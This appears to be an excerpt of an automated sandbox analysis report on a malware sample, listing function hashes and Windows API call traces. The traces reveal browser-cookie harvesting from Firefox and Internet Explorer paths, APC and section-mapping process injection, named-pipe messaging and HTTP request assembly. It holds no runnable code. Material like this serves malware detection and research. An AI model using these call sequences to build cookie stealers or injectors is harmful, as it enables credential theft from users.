  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
